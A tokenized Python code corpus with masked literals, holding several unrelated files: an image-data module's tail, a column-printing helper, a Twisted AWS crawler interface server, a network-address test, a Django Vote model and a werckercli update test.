<EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" 
<EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" 
<EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" 
<EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> getretriever_logo_liberationData = retriever_logo_liberation . GetData <EOL> getretriever_logo_liberationImage = retriever_logo_liberation . GetImage <EOL> getretriever_logo_liberationBitmap = retriever_logo_liberation . GetBitmap </s>
<s> import sys <EOL> from term_size import get_terminal_size <EOL> def get_columns ( values , cols ) : <EOL> columns = [ ] <EOL> col_size = len ( values ) / cols <EOL> extra = len ( values ) % cols <EOL> n = <NUM_LIT:0> <EOL> for i in range ( cols ) : <EOL> s = col_size <EOL> if i + <NUM_LIT:1> <= extra : <EOL> s += <NUM_LIT:1> <EOL> this_column = values [ n : n + s ] <EOL> columns . append ( this_column ) <EOL> n += s <EOL> return columns <EOL> def printls ( values , max_width = None , spacing = <NUM_LIT:2> ) : <EOL> if sys . stdout . isatty ( ) and max_width is None : <EOL> cols , lines = get_terminal_size ( ) <EOL> max_width = cols <EOL> if max_width : <EOL> for cols in [ int ( len ( values ) / float ( i ) + <NUM_LIT:0.5> ) for i in range ( <NUM_LIT:1> , len ( values ) + <NUM_LIT:1> ) ] : <EOL> columns = get_columns ( values , cols ) <EOL> widths = [ max ( [ len ( c ) for c in column ] ) + <EOL> spacing for column in columns ] <EOL> if sum ( widths ) < max_width : <EOL> break <EOL> for pos in range ( len ( columns [ <NUM_LIT:0> ] ) ) : <EOL> for column , width in zip ( columns , widths ) : <EOL> if len ( column ) > pos : <EOL> print column [ pos ] . ljust ( width - <NUM_LIT:1> ) , <EOL> print <EOL> else : <EOL> for value in values : <EOL> print value </s>
<s> v0_8 = '''<STR_LIT>''' </s>
<s> import pprint <EOL> from uuid import uuid4 <EOL> from twisted . internet . defer import Deferred , DeferredList , maybeDeferred <EOL> from twisted . web . resource import Resource <EOL> from twisted . internet import reactor <EOL> from twisted . web import server <EOL> from . base import BaseServer , LOGGER <EOL> from . . resources import InterfaceResource , ExposedResource <EOL> from . . aws import sdb_now <EOL> from . . evaluateboolean import evaluateBoolean <EOL> PRETTYPRINTER = pprint . PrettyPrinter ( indent = <NUM_LIT:4> ) <EOL> class InterfaceServer ( BaseServer ) : <EOL> exposed_functions = [ ] <EOL> exposed_function_resources = { } <EOL> def __init__ ( self , <EOL> aws_access_key_id , <EOL> aws_secret_access_key , <EOL> aws_sdb_reservation_domain , <EOL> aws_s3_reservation_cache_bucket = None , <EOL> aws_s3_http_cache_bucket = None , <EOL> aws_s3_storage_bucket = None , <EOL> aws_sdb_coordination_domain = None , <EOL> max_simultaneous_requests = <NUM_LIT:50> , <EOL> max_requests_per_host_per_second = <NUM_LIT:1> , <EOL> max_simultaneous_requests_per_host = <NUM_LIT:5> , <EOL> port = <NUM_LIT> , <EOL> log_file = '<STR_LIT>' , <EOL> log_directory = None , <EOL> log_level = "<STR_LIT>" , <EOL> name = None , <EOL> time_offset = None ) : <EOL> if name == None : <EOL> name = "<STR_LIT>" % self . uuid <EOL> resource = Resource ( ) <EOL> interface_resource = InterfaceResource ( self ) <EOL> resource . putChild ( "<STR_LIT>" , interface_resource ) <EOL> self . function_resource = Resource ( ) <EOL> resource . putChild ( "<STR_LIT>" , self . function_resource ) <EOL> self . site_port = reactor . listenTCP ( port , server . Site ( resource ) ) <EOL> BaseServer . 
__init__ ( <EOL> self , <EOL> aws_access_key_id , <EOL> aws_secret_access_key , <EOL> aws_s3_reservation_cache_bucket = aws_s3_reservation_cache_bucket , <EOL> aws_s3_http_cache_bucket = aws_s3_http_cache_bucket , <EOL> aws_sdb_reservation_domain = aws_sdb_reservation_domain , <EOL> aws_s3_storage_bucket = aws_s3_storage_bucket , <EOL> aws_sdb_coordination_domain = aws_sdb_coordination_domain , <EOL> max_simultaneous_requests = max_simultaneous_requests , <EOL> max_requests_per_host_per_second = max_requests_per_host_per_second , <EOL> max_simultaneous_requests_per_host = max_simultaneous_requests_per_host , <EOL> log_file = log_file , <EOL> log_directory = log_directory , <EOL> log_level = log_level , <EOL> name = name , <EOL> time_offset = time_offset , <EOL> port = port ) <EOL> def start ( self ) : <EOL> reactor . callWhenRunning ( self . _start ) <EOL> return self . start_deferred <EOL> def _start ( self ) : <EOL> deferreds = [ ] <EOL> if self . time_offset is None : <EOL> deferreds . append ( self . getTimeOffset ( ) ) <EOL> d = DeferredList ( deferreds , consumeErrors = True ) <EOL> d . addCallback ( self . _startCallback ) <EOL> def _startCallback ( self , data ) : <EOL> for row in data : <EOL> if row [ <NUM_LIT:0> ] == False : <EOL> d = self . shutdown ( ) <EOL> d . addCallback ( self . _startHandleError , row [ <NUM_LIT:1> ] ) <EOL> return d <EOL> d = BaseServer . start ( self ) <EOL> def shutdown ( self ) : <EOL> deferreds = [ ] <EOL> LOGGER . debug ( "<STR_LIT>" % self . name ) <EOL> d = self . site_port . stopListening ( ) <EOL> if isinstance ( d , Deferred ) : <EOL> deferreds . append ( d ) <EOL> if len ( deferreds ) > <NUM_LIT:0> : <EOL> d = DeferredList ( deferreds ) <EOL> d . addCallback ( self . _shutdownCallback ) <EOL> return d <EOL> else : <EOL> return self . _shutdownCallback ( None ) <EOL> def _shutdownCallback ( self , data ) : <EOL> return BaseServer . 
shutdown ( self ) <EOL> def makeCallable ( self , func , interval = <NUM_LIT:0> , name = None , expose = False ) : <EOL> function_name = BaseServer . makeCallable ( <EOL> self , <EOL> func , <EOL> interval = interval , <EOL> name = name , <EOL> expose = expose ) <EOL> if expose : <EOL> self . exposed_functions . append ( function_name ) <EOL> er = ExposedResource ( self , function_name ) <EOL> function_name_parts = function_name . split ( "<STR_LIT:/>" ) <EOL> if len ( function_name_parts ) > <NUM_LIT:1> : <EOL> if function_name_parts [ <NUM_LIT:0> ] in self . exposed_function_resources : <EOL> r = self . exposed_function_resources [ function_name_parts [ <NUM_LIT:0> ] ] <EOL> else : <EOL> r = Resource ( ) <EOL> self . exposed_function_resources [ function_name_parts [ <NUM_LIT:0> ] ] = r <EOL> self . function_resource . putChild ( function_name_parts [ <NUM_LIT:0> ] , r ) <EOL> r . putChild ( function_name_parts [ <NUM_LIT:1> ] , er ) <EOL> else : <EOL> self . function_resource . putChild ( function_name_parts [ <NUM_LIT:0> ] , er ) <EOL> LOGGER . info ( "<STR_LIT>" % function_name ) <EOL> def createReservation ( self , function_name , ** kwargs ) : <EOL> if not isinstance ( function_name , str ) : <EOL> for key in self . functions : <EOL> if self . functions [ key ] [ "<STR_LIT>" ] == function_name : <EOL> function_name = key <EOL> break <EOL> if function_name not in self . functions : <EOL> raise Exception ( "<STR_LIT>" % function_name ) <EOL> function = self . 
functions [ function_name ] <EOL> filtered_kwargs = { } <EOL> for key in function [ "<STR_LIT>" ] : <EOL> if key in kwargs : <EOL> filtered_kwargs [ key ] = kwargs [ key ] <EOL> else : <EOL> raise Exception ( "<STR_LIT>" % ( key , function [ "<STR_LIT>" ] , function [ "<STR_LIT>" ] ) ) <EOL> for key in function [ "<STR_LIT>" ] : <EOL> if key in kwargs : <EOL> filtered_kwargs [ key ] = kwargs [ key ] <EOL> if function [ "<STR_LIT>" ] > <NUM_LIT:0> : <EOL> reserved_arguments = { } <EOL> reserved_arguments [ "<STR_LIT>" ] = function_name <EOL> reserved_arguments [ "<STR_LIT>" ] = sdb_now ( offset = self . time_offset ) <EOL> reserved_arguments [ "<STR_LIT>" ] = reserved_arguments [ "<STR_LIT>" ] <EOL> reserved_arguments [ "<STR_LIT>" ] = "<STR_LIT:0>" <EOL> arguments = { } <EOL> arguments . update ( reserved_arguments ) <EOL> arguments . update ( filtered_kwargs ) <EOL> uuid = uuid4 ( ) . hex <EOL> LOGGER . debug ( "<STR_LIT>" % ( function_name , uuid ) ) <EOL> a = self . sdb . putAttributes ( self . aws_sdb_reservation_domain , uuid , arguments ) <EOL> a . addCallback ( self . _createReservationCallback , function_name , uuid ) <EOL> a . addErrback ( self . _createReservationErrback , function_name , uuid ) <EOL> if "<STR_LIT>" in kwargs and not evaluateBoolean ( kwargs [ "<STR_LIT>" ] ) : <EOL> d = DeferredList ( [ a ] , consumeErrors = True ) <EOL> else : <EOL> LOGGER . debug ( "<STR_LIT>" % ( function_name , PRETTYPRINTER . pformat ( filtered_kwargs ) ) ) <EOL> self . active_jobs [ uuid ] = True <EOL> b = self . callExposedFunction ( function [ "<STR_LIT>" ] , filtered_kwargs , function_name , uuid = uuid ) <EOL> d = DeferredList ( [ a , b ] , consumeErrors = True ) <EOL> d . addCallback ( self . _createReservationCallback2 , function_name , uuid ) <EOL> d . addErrback ( self . _createReservationErrback2 , function_name , uuid ) <EOL> return d <EOL> else : <EOL> LOGGER . debug ( "<STR_LIT>" % ( function_name , PRETTYPRINTER . 
pformat ( filtered_kwargs ) ) ) <EOL> d = self . callExposedFunction ( function [ "<STR_LIT>" ] , filtered_kwargs , function_name ) <EOL> return d <EOL> def _createReservationCallback ( self , data , function_name , uuid ) : <EOL> LOGGER . error ( data ) <EOL> LOGGER . debug ( "<STR_LIT>" % ( function_name , uuid ) ) <EOL> return uuid <EOL> def _createReservationErrback ( self , error , function_name , uuid ) : <EOL> LOGGER . error ( "<STR_LIT>" % ( function_name , uuid , error ) ) <EOL> return error <EOL> def _createReservationCallback2 ( self , data , function_name , uuid ) : <EOL> for row in data : <EOL> if row [ <NUM_LIT:0> ] == False : <EOL> raise row [ <NUM_LIT:1> ] <EOL> if len ( data ) == <NUM_LIT:1> : <EOL> return { data [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] : { } } <EOL> else : <EOL> return { data [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] : data [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] } <EOL> def _createReservationErrback2 ( self , error , function_name , uuid ) : <EOL> LOGGER . error ( "<STR_LIT>" % ( function_name , uuid , error ) ) <EOL> return error <EOL> def showReservation ( self , uuid ) : <EOL> d = self . sdb . getAttributes ( self . aws_sdb_reservation_domain , uuid ) <EOL> return d <EOL> def executeReservation ( self , uuid ) : <EOL> sql = "<STR_LIT>" % ( self . aws_sdb_reservation_domain , uuid ) <EOL> LOGGER . debug ( "<STR_LIT>" % sql ) <EOL> d = self . sdb . select ( sql ) <EOL> d . addCallback ( self . _executeReservationCallback ) <EOL> d . addErrback ( self . _executeReservationErrback ) <EOL> return d <EOL> def _executeReservationCallback ( self , data ) : <EOL> if len ( data ) == <NUM_LIT:0> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> uuid = data . keys ( ) [ <NUM_LIT:0> ] <EOL> kwargs_raw = { } <EOL> reserved_arguments = { } <EOL> for key in data [ uuid ] : <EOL> if key in self . 
reserved_arguments : <EOL> reserved_arguments [ key ] = data [ uuid ] [ key ] [ <NUM_LIT:0> ] <EOL> else : <EOL> kwargs_raw [ key ] = data [ uuid ] [ key ] [ <NUM_LIT:0> ] <EOL> function_name = reserved_arguments [ "<STR_LIT>" ] <EOL> if function_name not in self . functions : <EOL> raise Exception ( "<STR_LIT>" % ( function_name , uuid ) ) <EOL> return <EOL> if "<STR_LIT>" not in reserved_arguments : <EOL> self . deleteReservation ( uuid ) <EOL> raise Exception ( "<STR_LIT>" % uuid ) <EOL> if "<STR_LIT>" not in reserved_arguments : <EOL> self . deleteReservation ( uuid , function_name = function_name ) <EOL> raise Exception ( "<STR_LIT>" % ( function_name , uuid ) ) <EOL> if "<STR_LIT>" not in reserved_arguments : <EOL> self . deleteReservation ( uuid , function_name = function_name ) <EOL> raise Exception ( "<STR_LIT>" % ( function_name , uuid ) ) <EOL> if "<STR_LIT>" not in reserved_arguments : <EOL> self . deleteReservation ( uuid , function_name = function_name ) <EOL> raise Exception ( "<STR_LIT>" % ( function_name , uuid ) ) <EOL> if function_name in self . functions : <EOL> exposed_function = self . functions [ function_name ] <EOL> else : <EOL> raise Exception ( "<STR_LIT>" % function_name ) <EOL> return <EOL> kwargs = { } <EOL> for key in kwargs_raw : <EOL> if key in exposed_function [ "<STR_LIT>" ] : <EOL> kwargs [ key ] = kwargs_raw [ key ] <EOL> if key in exposed_function [ "<STR_LIT>" ] : <EOL> kwargs [ key ] = kwargs_raw [ key ] <EOL> has_reqiured_arguments = True <EOL> for key in exposed_function [ "<STR_LIT>" ] : <EOL> if key not in kwargs : <EOL> has_reqiured_arguments = False <EOL> raise Exception ( "<STR_LIT>" % ( function_name , uuid , key ) ) <EOL> LOGGER . debug ( "<STR_LIT>" % function_name ) <EOL> return self . callExposedFunction ( exposed_function [ "<STR_LIT>" ] , kwargs , function_name , uuid = uuid ) <EOL> def _executeReservationErrback ( self , error ) : <EOL> LOGGER . error ( "<STR_LIT>" % error ) </s>
<s> from twisted . trial import unittest <EOL> from twisted . internet import reactor <EOL> from twisted . internet . defer import Deferred <EOL> import os <EOL> import sys <EOL> sys . path . append ( os . path . join ( os . path . dirname ( __file__ ) , "<STR_LIT>" ) ) <EOL> import twisted <EOL> twisted . internet . base . DelayedCall . debug = True <EOL> from awspider . networkaddress import NetworkAddressGetter , getNetworkAddress <EOL> import re <EOL> class NetworkAddressTestCase ( unittest . TestCase ) : <EOL> def testGetNetworkAddress ( self ) : <EOL> d = getNetworkAddress ( ) <EOL> d . addCallback ( self . _testGetNetworkAddressCallback ) <EOL> return d <EOL> def _testGetNetworkAddressCallback ( self , result ) : <EOL> if "<STR_LIT>" in result : <EOL> self . _checkIP ( result [ "<STR_LIT>" ] ) <EOL> if "<STR_LIT>" in result : <EOL> self . _checkIP ( result [ "<STR_LIT>" ] ) <EOL> if "<STR_LIT>" not in result and "<STR_LIT>" not in result : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> def testNetworkAddressGetter ( self ) : <EOL> n = NetworkAddressGetter ( ) <EOL> d = n ( ) <EOL> d . addCallback ( self . _testGetNetworkAddressCallback ) <EOL> return d <EOL> def testGetPublicIP ( self ) : <EOL> n = NetworkAddressGetter ( ) <EOL> d = n . getPublicIP ( ) <EOL> d . addCallback ( self . _testGetNetworkAddressCallback ) <EOL> return d <EOL> def testGetAmazonIPs ( self ) : <EOL> n = NetworkAddressGetter ( ) <EOL> d = n . getAmazonIPs ( ) <EOL> d . addCallback ( self . _testGetNetworkAddressCallback ) <EOL> return d <EOL> def testGetIPPages ( self ) : <EOL> n = NetworkAddressGetter ( ) <EOL> d = n . getIPPages ( ) <EOL> d . addCallback ( self . _checkIP ) <EOL> return d <EOL> def testGetDomaintools ( self ) : <EOL> n = NetworkAddressGetter ( ) <EOL> d = n . getDomaintools ( ) <EOL> d . addCallback ( self . _checkIP ) <EOL> return d <EOL> def _checkIP ( self , s ) : <EOL> ip_address_regex = r"<STR_LIT>" <EOL> if len ( re . 
findall ( ip_address_regex , s ) ) != <NUM_LIT:1> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> return True </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> from django . db import models <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . contrib . contenttypes . fields import GenericForeignKey <EOL> from django . conf import settings <EOL> from django . utils import timezone <EOL> _SCORE_TYPE_CHOICES = ( <EOL> ( - <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ) <EOL> SCORE_TYPES = dict ( ( value , key ) for key , value in _SCORE_TYPE_CHOICES ) <EOL> class Vote ( models . Model ) : <EOL> content_type = models . ForeignKey ( ContentType , related_name = "<STR_LIT>" ) <EOL> object_id = models . PositiveIntegerField ( ) <EOL> key = models . CharField ( max_length = <NUM_LIT:32> ) <EOL> score = models . SmallIntegerField ( choices = _SCORE_TYPE_CHOICES ) <EOL> user = models . ForeignKey ( settings . AUTH_USER_MODEL , blank = True , null = True , <EOL> related_name = "<STR_LIT>" ) <EOL> ip_address = models . GenericIPAddressField ( ) <EOL> date_added = models . DateTimeField ( default = timezone . now , editable = False ) <EOL> date_changed = models . DateTimeField ( default = timezone . now , editable = False ) <EOL> content_object = GenericForeignKey ( ) <EOL> class Meta : <EOL> unique_together = ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:key>' , '<STR_LIT:user>' , <EOL> '<STR_LIT>' ) ) <EOL> def __unicode__ ( self ) : <EOL> return u"<STR_LIT>" % ( self . user , self . score , <EOL> self . content_object ) <EOL> def save ( self , * args , ** kwargs ) : <EOL> self . date_changed = timezone . now ( ) <EOL> super ( Vote , self ) . save ( * args , ** kwargs ) <EOL> def partial_ip_address ( self ) : <EOL> ip = self . ip_address . split ( '<STR_LIT:.>' ) <EOL> ip [ - <NUM_LIT:1> ] = '<STR_LIT>' <EOL> return '<STR_LIT:.>' . join ( ip ) <EOL> partial_ip_address = property ( partial_ip_address ) </s>
<s> import mock <EOL> from werckercli . tests import TestCase <EOL> from werckercli . commands import update <EOL> class UpdateTests ( TestCase ) : <EOL> LOW_VERSION = '<STR_LIT>' <EOL> HIGH_VERSION = '<STR_LIT>' <EOL> @ mock . patch ( "<STR_LIT>" , mock . Mock ( ) ) <EOL> def test_newer_version ( self ) : <EOL> self . assertTrue ( update . update ( self . LOW_VERSION ) ) <EOL> @ mock . patch ( "<STR_LIT>" , mock . Mock ( ) ) <EOL> def test_not_newer_version ( self ) : <EOL> self . assertFalse ( update . update ( self . HIGH_VERSION ) ) </s>
